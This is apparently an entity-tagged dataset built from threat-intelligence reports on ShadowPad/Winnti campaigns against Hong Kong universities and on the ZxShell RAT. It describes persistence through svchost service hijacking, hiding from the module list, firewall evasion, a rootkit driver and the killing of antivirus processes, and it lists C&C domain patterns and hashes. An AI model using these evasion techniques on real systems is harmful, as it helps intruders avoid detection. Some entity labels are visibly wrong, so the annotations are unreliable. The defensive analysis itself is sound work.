used O
to O
decrypt O
the O
strings O
is O
the O
same O
as O
the O
one O
used O
to O
decrypt O
the O
static O
strings O
of O
the O
module O
. O

The O
campaign O
ID O
is O
located O
at O
offset O
0x99 O
and O
is O
the O
name O
of O
the O
targeted O
university O
. O

Having O
a O
campaign O
ID O
related O
to O
the O
target O
is O
quite O
common O
in O
the O
case O
of O
ShadowPad S-MAL
and O
Winnti S-MAL
. O

Interestingly O
, O
the O
timestamp O
present O
in O
this O
config O
at O
offset O
0x84 O
is O
later O
than O
the O
modules O
’ O
timestamps O
and O
the O
loader O
compilation O
timestamp O
. O

This O
suggests O
that O
this O
config O
is O
added O
manually O
to O
the O
sample O
after O
having O
been O
built O
. O

Even O
though O
it O
’s O
probably O
coincidental O
, O
the O
date O
within O
the O
config O
corresponds O
to O
the O
date O
of O
the O
first O
detection O
of O
this O
sample O
at O
the O
corresponding O
university O
. O

Once O
installed O
on O
the O
system O
, O
ShadowPad S-MAL
starts O
a O
hidden O
and O
suspended O
Microsoft B-TOOL
Windows I-TOOL
Media I-TOOL
Player E-TOOL
wmplayer.exe S-FILE
process O
and O
injects O
itself O
into O
that O
process O
. O

The O
path O
to O
wmplayer.exe S-FILE
is O
provided O
by O
the O
Config O
module O
. O

Once O
ShadowPad S-MAL
is O
injected O
into O
wmplayer.exe S-FILE
, O
the O
Online O
module O
will O
contact O
the O
C&C S-TOOL
server O
using O
the O
URL O
specified O
in O
the O
configuration O
. O

The O
communication O
is O
then O
handled O
by O
the O
TCP S-PROT
module O
( O
200 O
) O
, O
which O
was O
previously O
documented O
by O
Kaspersky S-SECTEAM
. O

In O
addition O
to O
ShadowPad S-MAL
, O
the O
Winnti S-MAL
malware O
was O
found O
on O
some O
machines O
at O
these O
two O
universities O
at O
the O
end B-TIME
of I-TIME
October E-TIME
( O
i.e O
. O
two O
weeks O
before O
ShadowPad S-MAL
) O
in O
the O
file O
C:\Windows\System32\oci.dll S-FILE
and O
is O
detected O
by O
ESET S-IDTY
products O
as O
Win64/Winnti.CA O
. O

The O
Winnti S-MAL
malware O
usually O
contains O
a O
configuration O
specifying O
a O
campaign O
ID O
and O
a O
C&C S-TOOL
URL O
. O

On O
all O
machines O
the O
campaign O
ID O
matches O
the O
name O
of O
the O
targeted O
university O
and O
the O
C&C S-TOOL
URLs O
are O
: O

w[redacted].livehost.live S-URL
: O
443 O
. O
w[redacted].dnslookup.services S-URL
: O
443 O
. O
where O
the O
redacted O
part O
corresponds O
to O
the O
name O
of O
the O
targeted O
university O
. O

One O
can O
observe O
that O
the O
C&C S-TOOL
URL O
used O
by O
both O
Winnti S-MAL
and O
ShadowPad S-MAL
complies O
to O
the O
scheme O
[backdoor_type][target_name].domain.tld O
: O
443 O
where O
[backdoor_type] O
is O
a O
single O
letter O
which O
is O
either O
“ O
w O
” O
in O
the O
case O
of O
the O
Winnti S-MAL
malware O
or O
“ O
b O
” O
in O
the O
case O
of O
ShadowPad S-MAL
. O

From O
this O
format O
, O
we O
were O
able O
to O
find O
several O
C&C S-URL
URLs O
, O
including O
three O
additional O
Hong B-LOC
Kong E-LOC
universities O
’ O
names O
. O

The O
campaign O
identifiers O
found O
in O
the O
samples O
we O
’ve O
analyzed O
match O
the O
subdomain O
part O
of O
the O
C&C S-TOOL
server O
, O
showing O
that O
these O
samples O
were O
really O
targeted O
against O
these O
universities O
. O

The O
Winnti B-APT
Group E-APT
is O
still O
actively O
using O
one O
of O
its O
flagship O
backdoors S-MAL
, O
ShadowPad S-MAL
, O
this O
time O
against O
Hong B-LOC
Kong E-LOC
universities O
. O

In O
this O
campaign O
, O
the O
VMProtected S-TOOL
launcher O
used O
with O
ShadowPad S-MAL
, O
as O
well O
as O
with O
the O
PortReuse B-MAL
backdoor E-MAL
and O
skip-2.0 S-MAL
, O
was O
replaced O
by O
a O
simpler O
one O
. O

That O
these O
samples O
, O
in O
addition O
to O
having O
been O
found O
at O
these O
universities O
, O
contain O
campaign O
IDs O
matching O
the O
universities O
’ O
names O
and O
use O
C&C S-TOOL
URLs O
containing O
the O
universities O
’ O
names O
are O
good O
indications O
that O
this O
campaign O
is O
highly O
targeted O
. O

We O
will O
continue O
to O
monitor O
new O
activities O
of O
the O
Winnti B-APT
Group E-APT
and O
will O
publish O
relevant O
information O
on O
our O
blog O
. O

For O
any O
inquiries O
, O
contact O
us O
at O
threatintel@eset.com O
. O

The O
IoCs O
are O
also O
available O
in O
our O
GitHub S-TOOL
repository O
. O

ESET S-IDTY
detection O
names O
: O
Win32 S-OS
/ O
Shadowpad.C S-FILE
trojan S-MAL
Win64 S-OS
/ O
Winnti.CA S-FILE
trojan S-MAL
. O

Winnti S-APT
: O
hpqhvsei.dll S-FILE
. O

Winnti S-APT
: O
CLR.exe S-FILE
. O

Winnti S-APT
: O
hpqhvsei.dll S-FILE
. O

Winnti S-APT
: O
hpqhvind.exe S-FILE
. O

Winnti S-APT
: O
hpqhvsei.dll S-FILE
. O

Winnti S-APT
: O
oci.dll S-FILE
. O

Winnti S-APT
: O
C&C S-TOOL
: O
b[org_name].dnslookup.services S-URL
: O
443 O
. O

Winnti S-APT
: O
C&C S-TOOL
: O
w[org_name].livehost.live S-URL
: O
443 O
. O

Winnti S-APT
: O
C&C S-TOOL
: O
w[org_name].dnslookup.services S-URL
: O
443 O
. O


Middle B-LOC
Eastern E-LOC
hacking O
group O
is O
using O
FinFisher S-MAL
malware O
to O
conduct O
international O
espionage O
. O

Recently O
, O
there O
was O
a O
blog O
post O
on O
the O
takedown O
of O
a O
botnet S-MAL
used O
by O
threat O
actor O
group O
known O
as O
Group B-APT
72 E-APT
and O
their O
involvement O
in O
Operation B-ACT
SMN E-ACT
. O

This O
group O
is O
sophisticated O
, O
well O
funded O
, O
and O
exclusively O
targets O
high O
profile O
organizations O
with O
high O
value O
intellectual O
property O
in O
the O
manufacturing O
, O
industrial O
, O
aerospace O
, O
defense O
, O
and O
media O
sector O
. O

The O
primary O
attack O
vectors O
are O
watering-hole S-ACT
, O
spear B-ACT
phishing E-ACT
, O
and O
other O
web-based O
attacks O
. O

Frequently O
, O
a O
remote B-TOOL
administration I-TOOL
tool E-TOOL
( O
RAT S-TOOL
) O
is O
used O
to O
maintain O
persistence O
within O
a O
victim O
’s O
organization O
. O

These O
tools O
are O
used O
to O
further O
compromise O
the O
organization O
by O
attacking O
other O
hosts O
inside O
the O
targets O
network O
. O

ZxShell S-MAL
( O
aka O
Sensocode S-MAL
) O
is O
a O
Remote B-TOOL
Administration I-TOOL
Tool E-TOOL
( O
RAT S-TOOL
) O
used O
by O
Group B-APT
72 E-APT
to O
conduct O
cyber-espionage O
operations O
. O

Once O
the O
RAT S-TOOL
is O
installed O
on O
the O
host O
it O
will O
be O
used O
to O
administer O
the O
client O
, O
exfiltrate O
data O
, O
or O
leverage O
the O
client O
as O
a O
pivot O
to O
attack B-ACT
an I-ACT
organization I-ACT
’s I-ACT
internal I-ACT
infrastructure E-ACT
. O

Here O
is O
a O
short O
list O
of O
the O
types O
of O
tools O
included O
with O
ZxShell S-MAL
: O

Keylogger S-TOOL
( O
used O
to O
capture O
passwords O
and O
other O
interesting O
data O
) O
. O

Command B-TOOL
line I-TOOL
shell E-TOOL
for O
remote O
administration O
. O

Remote B-TOOL
desktop E-TOOL
. O

Various B-TOOL
network I-TOOL
attack I-TOOL
tools E-TOOL
used O
to O
fingerprint O
and O
compromise O
other O
hosts O
on O
the O
network O
. O

Local B-TOOL
user I-TOOL
account I-TOOL
creation I-TOOL
tools E-TOOL
. O

For O
a O
complete O
list O
of O
tools O
please O
see O
the O
MainConnectionIo O
section O
. O

The O
following O
paper O
is O
a O
technical O
analysis O
on O
the O
functionality O
of O
ZxShell S-MAL
. O

The O
analysts O
involved O
were O
able O
to O
identify O
command B-TOOL
and I-TOOL
control E-TOOL
( O
C2 S-TOOL
) O
servers O
, O
dropper O
and O
installation O
methods O
, O
means O
of O
persistence O
, O
and O
identify O
the O
attack O
tools O
that O
are O
core O
to O
the O
RAT S-TOOL
’s O
purpose O
. O

In O
addition O
, O
the O
researchers O
used O
their O
analysis O
to O
provide O
detection O
coverage O
for O
Snort S-TOOL
, O
Fireamp S-TOOL
, O
and O
ClamAV S-TOOL
. O

ZxShell S-MAL
has O
been O
around O
since O
2004 S-TIME
. O

There O
are O
a O
lot O
of O
versions O
available O
in O
the O
underground O
market O
. O

We O
have O
analyzed O
the O
most O
common O
version O
of O
ZxShell S-MAL
, O
version O
3.10 O
. O

There O
are O
newer O
versions O
, O
up O
to O
version O
3.39 O
as O
of O
October B-TIME
2014 E-TIME
. O

An O
individual O
who O
goes O
by O
the O
name O
LZX O
in O
some O
online O
forums O
is O
believed O
to O
be O
the O
original O
author O
of O
ZxShell S-MAL
. O

Since O
ZxShell S-MAL
has O
been O
around O
since O
at O
least B-TIME
2004 E-TIME
, O
numerous O
people O
have O
purchased O
or O
obtained O
the O
tools O
necessary O
to O
set O
up O
ZxShell S-MAL
command B-TOOL
and I-TOOL
control E-TOOL
servers O
( O
C&C S-TOOL
) O
and O
generate O
the O
malware O
that O
is O
placed O
on O
the O
victim O
’s O
network O
. O

ZxShell S-MAL
has O
been O
observed O
to O
be O
distributed O
through O
phishing B-ACT
attacks E-ACT
, O
dropped O
by O
exploits O
that O
leverage O
vulnerabilities O
such O
as O
CVE-2011-2462 S-VULID
, O
CVE-2013-3163 S-VULID
, O
and O
CVE-2014-0322 S-VULID
. O

To O
illustrate O
the O
functionality O
of O
main O
ZxShell S-MAL
module O
, O
Let O
’s O
take O
a O
look O
at O
the O
following O
sample O
: O

MD5 S-ENCR
: O
e3878d541d17b156b7ca447eeb49d96a S-MD5
. O

SHA256 S-ENCR
: O
1eda7e556181e46ba6e36f1a6bfe18ff5566f9d5e51c53b41d08f9459342e26c S-SHA2
. O

It O
exports O
the O
following O
functions O
, O
which O
are O
examined O
in O
greater O
detail O
below O
: O
DllMain O
Install O
UnInstall O
ServiceMain O
ShellMain O
ShellMainThread O
zxFunction001 O
zxFunction002 O
. O

DllMain O
performs O
the O
initialization O
of O
ZxShell S-MAL
. O

It O
allocates O
a O
buffer O
of O
0x2800 O
bytes O
and O
copies O
the O
code O
for O
the O
ZxGetLibAndProcAddr O
function O
. O

To O
copy O
memory O
, O
the O
memcpy O
function O
is O
invoked O
. O

It O
is O
not O
directly O
used O
from O
msvcrt.dll S-FILE
but O
is O
instead O
copied O
to O
another O
memory O
chunk O
before O
being O
called O
. O

Finally O
, O
the O
trojan S-MAL
Import B-TOOL
Address I-TOOL
Table E-TOOL
( O
IAT S-TOOL
) O
is O
resolved O
and O
the O
file O
path O
of O
the O
process O
that O
hosts O
the O
DLL S-TOOL
is O
resolved O
and O
saved O
in O
a O
global O
variable O
. O

ZxShell.dll S-FILE
is O
injected O
in O
a O
shared O
SVCHOST S-TOOL
process O
. O

The O
Svchost S-TOOL
group O
registry O
key O
HKLM\SOFTWARE\Microsoft\Windows S-OS
NT\CurrentVersion\SvcHost O
is O
opened O
and O
the O
netsvc S-TOOL
group O
value O
data O
is O
queried O
to O
generate O
a O
name O
for O
the O
service O
. O

Before O
the O
malware O
can O
be O
installed O
a O
unique O
name O
must O
to O
be O
generated O
for O
the O
service O
. O

The O
malware O
accomplishes O
this O
through O
querying O
the O
netsvc S-TOOL
group O
value O
data O
located O
in O
the O
svchost S-TOOL
group O
registry O
key O
which O
is O
HKLM\SOFTWARE\Microsoft\Windows S-OS
NT\CurrentVersion\SvcHost O
. O

At O
startup O
, O
Svchost.exe S-FILE
checks O
the O
services O
part O
of O
the O
registry O
and O
constructs O
a O
list O
of O
services O
to O
load O
. O

Each O
Svchost S-TOOL
session O
can O
contain O
multiple O
shared O
services O
that O
are O
organized O
in O
groups O
. O

Therefore O
, O
separate O
services O
can O
run O
, O
depending O
on O
how O
and O
where O
Svchost.exe S-FILE
is O
started O
. O

Svchost.exe S-FILE
groups O
are O
identified O
in O
the O
above O
registry O
key O
. O

Each O
value O
under O
this O
key O
represents O
a O
separate O
Svchost S-TOOL
group O
and O
appears O
as O
a O
separate O
instance O
when O
you O
are O
viewing O
active O
processes O
. O

Each O
value O
is O
a O
REG_MULTI_SZ O
value O
and O
contains O
the O
services O
that O
run O
under O
that O
Svchost S-TOOL
group O
. O

Each O
Svchost S-TOOL
group O
can O
contain O
one O
or O
more O
service O
names O
that O
are O
extracted O
from O
the O
following O
registry O
key O
, O
whose O
Parameters O
key O
contains O
a O
ServiceDLL S-TOOL
value O
: O
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Service O
. O

On O
a O
Windows S-OS
machine O
, O
the O
netsvc S-TOOL
group O
contains O
names O
of O
both O
existing O
and O
non-existing O
services O
. O

ZxShell S-MAL
exploits O
this O
fact O
by O
cycling O
between O
each O
of O
the O
names O
, O
verifying O
the O
existence O
of O
the O
real O
service O
. O

The O
service O
’s O
existence O
is O
verified O
with O
the O
ServiceExists O
function O
, O
which O
attempts O
to O
open O
the O
relative O
registry O
sub-key O
in O
HKLM\SYSTEM\CurrentControlSet\Services O
. O

The O
first O
service O
name O
that O
is O
not O
installed O
on O
the O
system O
becomes O
the O
ZxShell S-MAL
service O
name O
. O

A O
new O
service O
is O
then O
created O
using O
the O
service O
parser O
function O
ProcessScCommand O
. O

ZxShell S-MAL
implemented O
its O
own O
version O
of O
the O
Windows B-TOOL S-OS I-TOOL
SC I-TOOL
command E-TOOL
. O

There O
are O
minor O
differences O
between O
the O
ZxShell S-MAL
implementation O
of O
this O
command O
and O
the O
original O
Windows S-OS
one O
. O

The O
installed O
service O
registry O
key O
is O
opened O
and O
the O
2 O
values O
under O
its O
Parameter O
subkey O
are O
created O
. O

These O
2 O
values O
, O
ServiceDll S-TOOL
and O
ServiceDllUnloadOnStop S-TOOL
are O
needed O
for O
services O
that O
run O
in O
a O
shared O
process O
. O

Before O
the O
service O
is O
started O
ChangeServiceConfig O
is O
called O
to O
modify O
the O
service O
type O
to O
shared O
and O
interactive O
. O

If O
the O
service O
fails O
to O
start O
then O
a O
random O
service O
name O
formatted O
as O
netsvc_xxxxxxxx O
, O
where O
xxxxxxxx O
represent O
an O
8-digit O
random O
hex O
value O
, O
is O
added O
to O
the O
netsvc S-TOOL
group O
and O
the O
entire O
function O
is O
repeated O
. O

This O
function O
is O
the O
entry O
point O
of O
the O
service O
. O

It O
registers O
the O
service O
using O
the O
RegisterServiceCtrlHandler O
Windows S-OS
API O
function O
. O

The O
ZxShell S-MAL
service O
handler O
routine O
is O
only O
a O
stub O
: O
it O
responds O
to O
each O
service O
request O
code O
, O
doing O
nothing O
, O
and O
finally O
exits O
. O

It O
sets O
the O
service O
status O
to O
RUNNING O
and O
finally O
calls O
the O
ShellMain O
function O
of O
ZxShell S-MAL
. O

The O
ShellMain O
function O
is O
a O
stub O
that O
relocates O
the O
DLL S-TOOL
to O
another O
buffer O
and O
spawns O
a O
thread O
that O
starts O
from O
ShellMainThreadInt O
at O
offset O
+0xC0CD O
. O

The O
ShellMainThreadInt O
function O
gets O
the O
HeapDestroy O
Windows S-OS
API O
address O
and O
replaces O
the O
first O
3 O
bytes O
with O
the O
RET O
4 O
opcode O
. O

Subsequently O
, O
it O
calls O
the O
FreeLibrary O
function O
to O
free O
its O
own O
DLL S-TOOL
buffer O
located O
at O
its O
original O
address O
. O

Because O
of O
this O
, O
the O
allocated O
heaps O
will O
not O
be O
freed O
. O

It O
re-copies O
the O
DLL S-TOOL
from O
the O
new O
buffer O
to O
the O
original O
one O
using O
the O
memcpy O
function O
. O

Finally O
, O
it O
spawns O
the O
main O
thread O
that O
starts O
at O
the O
original O
location O
of O
ShellMainThread O
procedure O
, O
and O
terminates O
. O

At O
this O
point O
, O
the O
ZxShell S-MAL
library O
is O
no O
longer O
linked O
in O
the O
module O
list O
of O
the O
host O
process O
. O

This O
is O
important O
because O
if O
any O
system O
tool O
tries O
to O
open O
the O
host O
process O
it O
will O
never O
display O
the O
ZxShell S-MAL
DLL S-TOOL
. O

This O
thread O
implements O
the O
main O
code O
, O
responsible O
for O
the O
entire O
botnet S-MAL
DLL S-TOOL
. O

First O
, O
it O
checks O
if O
the O
DLL S-TOOL
is O
executed O
as O
a O
service O
. O

If O
so O
, O
it O
spawns O
the O
service O
watchdog S-TOOL
thread O
. O

The O
watchdog S-TOOL
thread O
checks O
the O
registry O
path O
of O
the O
ZxShell S-MAL
service O
every O
2 O
seconds O
, O
to O
verify O
that O
it O
has O
n’t O
been O
modified O
. O

If O
a O
user O
or O
an O
application O
modifies O
the O
ZxShell S-MAL
service O
registry O
key O
, O
the O
code O
restores O
the O
original O
infected O
service O
key O
and O
values O
. O

The O
buffer O
containing O
the O
ZxShell S-MAL
Dll S-TOOL
in O
the O
new O
location O
is O
freed O
using O
the O
VirtualFree O
API O
function O
. O

A O
handle O
to O
the O
DLL S-TOOL
file O
is O
taken O
in O
order O
to O
make O
its O
deletion O
more O
difficult O
. O

The O
ZxShell S-TOOL
mutex O
is O
created O
named O
@_ZXSHELL_@ O
. O

ZxShell S-MAL
plugins O
are O
parsed O
and O
loaded O
with O
the O
AnalyseAndLoadPlugins O
function O
. O

The O
plugin O
registry O
key O
HKLM\SYSTEM\CurrentControlSet\Control\zxplug O
is O
opened O
and O
each O
value O
is O
queried O
. O

The O
registry O
value O
contains O
the O
plugin O
file O
name O
. O

The O
target O
file O
is O
loaded O
using O
the O
LoadLibrary O
API O
function O
, O
and O
the O
address O
of O
the O
exported O
function O
zxMain O
is O
obtained O
with O
GetProcAddress O
. O

If O
the O
target O
filename O
is O
incorrect O
or O
invalid O
the O
plugin O
file O
is O
deleted O
and O
the O
registry O
value O
is O
erased O
. O

That O
is O
performed O
by O
the O
function O
DeleteAndLogPlugin O
. O

Otherwise O
, O
the O
plugin O
is O
added O
to O
an O
internal O
list O
. O

The O
thread O
KeyloggerThread S-APT
is O
spawned O
and O
is O
responsible O
for O
doing O
keylogging O
on O
the O
target O
workstation O
. O

We O
will O
take O
a O
look O
at O
the O
keylogger S-TOOL
later O
on O
. O

Finally O
the O
main O
network O
communication O
function O
GetIpListAndConnect O
is O
called O
. O

This O
function O
is O
at O
the O
core O
of O
the O
RAT S-TOOL
’s O
network O
communication O
. O

It O
starts O
by O
initializing O
a O
random O
number O
generator O
and O
reading O
100 O
bytes O
inside O
the O
ZxShell S-MAL
Dll S-TOOL
at O
a O
hardcoded O
location O
. O

These O
bytes O
are O
XOR S-ENCR
encrypted O
with O
the O
byte-key O
0x85 O
and O
contains O
a O
list O
of O
remote O
hosts O
where O
to O
connect O
. O

The O
data O
is O
decrypted O
, O
the O
remote O
host O
list O
is O
parsed O
and O
verified O
using O
the O
BuildTargetIpListStruct O
function O
. O

There O
are O
3 O
types O
of O
lists O
recognized O
by O
ZxShell S-MAL
: O
plain O
ip O
addresses O
, O
HTTP S-PROT
and O
FTP S-PROT
addresses O
. O

If O
the O
list O
does O
not O
contain O
any O
item O
, O
or O
if O
the O
verification O
has O
failed O
, O
the O
ZxShell S-MAL
sample O
tries O
to O
connect O
to O
a O
hardcoded O
host O

with O
the O
goal O
of O
retrieving O
a O
new O
updated O
list O
. O

Otherwise O
, O
ZxShell S-MAL
tries O
to O
connect O
to O
the O
first O
item O
of O
the O
list O
. O

If O
ZxShell S-MAL
successfully O
connects O
to O
the O
remote O
host O
, O
the O
function O
DoHandshake O
is O
called O
. O

This O
function O
implements O
the O
initial O
handshake O
which O
consists O
of O
exchanging O
16 O
bytes O
, O
0x00001985 O
and O
0x00000425, O

with O
the O
server O
. O

The O
function O
GetLocalPcDescrStr O
is O
used O
to O
compose O
a O
large O
string O
that O
contains O
system O
information O
of O
the O
target O
workstation O
. O

The O
string O
is O
sent O
to O
the O
remote O
host O
and O
the O
response O
is O
checked O
to O
see O
if O
the O
first O
byte O
of O
the O
response O
is O
0xF4, O
an O
arbitrary O
byte O
. O

If O
it O
is O
, O
the O
botnet S-MAL
connection O
I/O O
procedure O
is O
called O
through O
the O
MainConnectionIo O
function O
. O

Otherwise O
, O
the O
ZxShell S-MAL
code O
closes O
the O
socket O
used O
and O
sleeps O
for O
30 O
seconds O
. O

It O
will O
then O
retry O
the O
connection O
with O
the O
next O
remote O
host O
, O
if O
there O
is O
one O
. O

It O
is O
noteworthy O
that O
this O
function O
includes O
the O
code O
to O
set O
the O
ZxShell S-MAL
node O
as O
a O
server O
: O
if O
one O
of O
the O
hardcoded O
boolean O
value O
is O
set O
to O
1, O
a O
listening O
socket O
is O
created O
. O

The O
code O
waits O
for O
an O
incoming O
connection O
. O

When O
the O
connection O
is O
established O
a O
new O
thread O
is O
spawned O
that O
starts O
with O
the O
MainConnectionIo O
function O
. O

The O
MainConnectionIo O
function O
checks O
if O
the O
Windows S-OS
Firewall S-TOOL
is O
enabled O
, O
sets O
the O
Tcp B-TOOL
Keep I-TOOL
Alive E-TOOL
value O
and O
Non-blocking O
mode O
connection O
options O
and O
receives O
data O
from O
the O
remote O
host O
through O
the O
ReceiveCommandData O
function O
. O

Then O
the O
connection O
is O
retried O
. O

The O
received O
command O
is O
then O
processed O
by O
the O
ZxShell S-MAL
function O
with O
the O
ProcessCommand O
function O
. O

The O
command O
processing O
function O
starts O
by O
substituting O
the O
main O
module O
name O
and O
path O
in O
the O
hosting O
process O
PEB O
, O
with O
the O
one O
of O
the O
default O
internet O
browser O
. O

This O
trick O
renders O
identification O
by O
firewall S-TOOL
more O
cumbersome O
. O

A O
host O
firewall O

 S-TOOLwill O
recognize O
the O
outgoing O
connection O
as O
originated O
by O
the O
browser O
instead O
of O
the O
ZxShell S-MAL
service O
host O
process O
. O

The O
browser O
process O
always O
performs O
outgoing O
connections O
and O
the O
firewall S-TOOL
should O
n’t O
block O
them O
. O

The O
command O
processing O
is O
straightforward O
. O

Here O
is O
the O
list O
of O
common O
commands O
: O

Help O
/ O
? O
Get O
help O
. O

Exit O
/ O
Quit O
Exit O
and O
shut O
down O
the O
botnet O
client O
. O

SysInfo O
Get O
target O
System O
information O
. O

SYNFlood O
Perform O
a O
SYN O
attack O
on O
a O
host O
. O

Ps O
Process O
service O
Unix S-OS
command O
implementation O
. O

CleanEvent O
Clear O
System O
Event O
log O
. O

FindPass O
Find O
login O
account O
password O
. O

FileTime O
Get O
time O
information O
about O
a O
file O
. O

FindDialPass O
List O
all O
the O
dial-up O
accounts O
and O
passwords O
. O

User O
Account O
Management O
System O
. O

TransFile O
Transfer O
file O
in O
or O
from O
remote O
host O
. O

Execute O
Run O
a O
program O
in O
the O
remote O
host O
. O

SC O
Service O
control O
command O
, O
implemented O
as O
the O
Windows S-OS
one O
. O

CA O
Clone O
user O
account O
. O

RunAs O
Create O
new O
process O
as O
another O
User O
or O
Process O
context O
. O

TermSvc O
Terminal O
service O
configuration O
( O
working O
on O
Win B-OS
Xp/2003 E-OS
) O
. O

GetCMD O
Remote O
Shell O
. O

Shutdown O
Logout O
, O
shutdown O
or O
restart O
the O
target O
system O
. O

ZXARPS O
Spoofing O
, O
redirection O
, O
packet O
capture O
. O

ZXNC O
Run O
ZXNC O
v1.1 O
– O
a O
simple O
telnet O
client O
. O

ZXHttpProxy O
Run O
a O
HTTP O
proxy O
server O
on O
the O
workstation O
. O

ZXSockProxy O
Run O
a O
Sock O
4 O
& O
5 O
Proxy O
server O
. O

ZXHttpServer O
Run O
a O
custom O
HTTP S-PROT
server O
. O

PortScan O
Run O
TCP S-PROT
Port O
MultiScanner O
v1.0 O
. O

KeyLog O
Capture O
or O
record O
the O
remote O
computer O
’s O
keystrokes O
. O

The O
implementation O
is O
a O
userland O
keylogger S-TOOL
that O
polls O
the O
keymap O
with O
each O
keystroke O
. O

LoadDll S-TOOL
Load O
a O
DLL S-TOOL
into O
the O
specified O
process O
. O

End O
Terminate O
ZxShell S-MAL
DLL S-TOOL
. O

Uninstall O
Uninstall O
and O
terminate O
ZxShell S-MAL
bot O
DLL S-TOOL
. O

ShareShell O
Share O
a O
shell O
to O
other O
. O

CloseFW O
Switch O
off O
Windows S-OS
Firewall O
. O

FileMG O
File O
Manager O
. O
winvnc O
Remote O
Desktop O
. O
rPortMap O
Port O
Forwarding O
. O
capsrv O
Video O
Device O
Spying O
. O
zxplug O
Add O
and O
load O
a O
ZxShell S-MAL
custom O
plugin O
. O

This O
set O
of O
functionality O
allows O
the O
operator O
complete O
control O
of O
a O
system O
. O

Being O
able O
to O
transfer O
and O
execute O
files O
on O
the O
infected O
system O
means O
the O
attacker O
can O
run O
any O
code O
they O
please O
. O

Further O
, O
the O
keylogging O
and O
remote O
desktop O
functionality O
allows O
the O
operator O
to O
spy O
on O
the O
infected O
machine O
, O
observing O
all O
keystrokes O
and O
viewing O
all O
user O
actions O
. O

Unloads O
ZxShell S-MAL
and O
deletes O
all O
of O
the O
active O
components O
. O

This O
simply O
deletes O
the O
ZxShell S-MAL
service O
key O
from O
the O
Windows S-OS
registry O
( O
using O
SHDeleteKey O
Api O
) O
and O
all O
of O
the O
subkeys O
. O

Finally O
, O
it O
marks O
ZxShell S-MAL
main O
Dll S-TOOL
for O
deletion O
with O
the O
MoveFileEx O
Windows S-OS
API O
. O

This O
function O
is O
the O
supporting O
functionality O
for O
WinVNC S-TOOL
. O

To O
allow O
the O
VNC S-TOOL
session O
to O
connect O
, O
the O
current O
network O
socket O
WSAProtcol_Info S-TOOL
structure O
is O
written O
to O
a O
named O
pipe O
prior O
to O
calling O
zxFunction001 O
. O
zxFunction001 O
modifies O
the O
current O
process O
memory O
, O
uses O
data O
contained O
in O
the O
named O
pipe O
to O
create O
a O
socket O
, O
and O
then O
executes O
the O
code O
that O
sends O
the O
remote O
desktop O
session O
to O
the O
server O
controller O
. O

ZxFunction002 O
This O
will O
either O
bind O
the O
calling O
process O
to O
a O
port O
or O
has O
the O
calling O
process O
connect O
to O
a O
remote O
host O
. O

The O
functionality O
( O
connect O
or O
bind O
) O
depends O
on O
the O
data O
contained O
within O
the O
named O
pipe O
. O

Unlike O
zxFunction001, O
this O
is O
not O
used O
by O

any O
of O
the O
RAT S-TOOL
commands O
in O
the O
zxshell.dll S-FILE
. O

Apart O
from O
user-mode O
ZxShell S-MAL
droppers O
mentioned O
earlier O
, O
there O
is O
a O
file O
( O
SHA256 S-ENCR
: O
1e200d0d3de360d9c32e30d4c98f07e100f6260a86a817943a8fb06995c15335 S-SHA2
) O
that O
installs O
a O
kernel O
device O
driver O
called O
loveusd.sys S-FILE
. O

The O
architecture O
of O
this O
dropper O
is O
different O
from O
the O
others O
: O
it O
starts O
extracting O
the O
main O
driver O
from O
itself O
. O

It O
adds O
the O
SeLoadDriver S-TOOL
privilege O
to O
its O
access O
token O
and O
proceeds O
to O
install O
the O
driver O
as O
a O
fake O
disk O
filter O
driver O
. O

It O
then O
adds O
the O
“ O
Loveusd.sys S-FILE
” O
extracted O
driver O
name O
to O
the O
upper O
filter O
list O
. O

In O
our O
analysed O
sample O
the O
“ O
Loveusd.sys S-FILE
” O
driver O
is O
installed O
with O
the O
name O
“ O
USBHPMS S-FILE
” O
. O

Finally O
the O
driver O
is O
started O
using O
the O
ZwLoadDriver O
native O
API O
. O

The O
ZxShell S-MAL
driver O
starts O
by O
acquiring O
some O
kernel O
information O
and O
then O
hooking O
“ O
ObReferenceObjectByHandle O
” O
API O
. O

Finally O
it O
spawns O
2 O
system O
threads O
. O

The O
first O
thread O
is O
the O
“ O
communication S-TOOL
” O
thread O
. O

ZxShell S-MAL
employs O
a O
strange O
method O
for O
communication O
: O
it O
hooks O
the O
NtWriteFile O
API O
and O
recognizes O
5 O
different O
special O
handle O
values O
as O
commands O
: O

0x111111111 O
: O
Hide O
“ O
Loveusd O
” O
driver O
from O
the O
system O
kernel O
driver O
list O
. O
0x22222222 O
: O
Securely O
delete O
an O
in-use O
or O
no-access O
target O
file-name O
. O
0x44444444 O
: O
Unhook O
the O
ZwWriteFile O
API O
and O
hook O
KiFastCallEntry O
. O
0x55555555 O
: O
Remove O
the O
ZxShell S-MAL
Image O
Load O
Notify O
routine O
. O
0x88888888 O
: O
Set O
a O
special O
value O
called O
“ O
type O
” O
in O
Windows S-OS
registry O
key O
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DriverMain O
. O

The O
second O
Loveusd S-TOOL
system O
thread O
does O
a O
lot O
of O
things O
. O

Its O
principal O
duties O
are O
to O
create O
the O
ZxShell S-MAL
main O
DLL S-TOOL
in O
“ O
c:\Windows\System32\commhlp32.dll S-FILE
” O
and O
to O
install O
the O
Kernel O
“ O
Load B-TOOL
Image I-TOOL
Notify I-TOOL
routine E-TOOL
” O
. O

The O
code O
then O
tries O
to O
kill O
each O
process O
and O
service O
that O
belongs O
to O
the O
following O
list O
of O
AV O
products O
: O
Symantec B-TOOL S-IDTY I-TOOL
Firewall E-TOOL
Norton S-TOOL
ESET S-TOOL
McAfee S-TOOL
Avast S-TOOL
Avira S-TOOL
Sophos S-TOOL
Malwarebytes S-TOOL
. O

Next O
, O
the O
ZxShell S-MAL
Load-Image O
Notify O
function O
prevents O
the O
AV O
processes O
from O
restarting O
. O

The O
installation O
procedure O
continues O
in O
the O
user-mode O
dropper O
. O

The O
ZxShell S-MAL
service O
is O
installed O
as O
usual O
, O
and O
the O
in-execution O
dropper O
is O
deleted O
permanently O
using O
the O
special O
handle O
value O
0x22222222 O
for O
the O
WriteFile O
API O
call O
. O

This O
handle O
value O
is O
invalid O
: O
all O
the O
windows S-OS
kernel O
handle O
values O
are O
by O
design O
a O
multiple O
of O
4 O
. O

The O
ZxShell S-MAL
hook O
code O
knows O
that O
and O
intercept O
it O
. O

ObReferenceObjectByHandle O
is O
a O
Kernel O
routine O
designed O
to O
validate O
a O
target O
object O
and O
return O
the O
pointer O
to O
its O
object O
body O
( O
and O
even O
its O
handle O
information O
) O
, O
starting O
from O
the O
object O
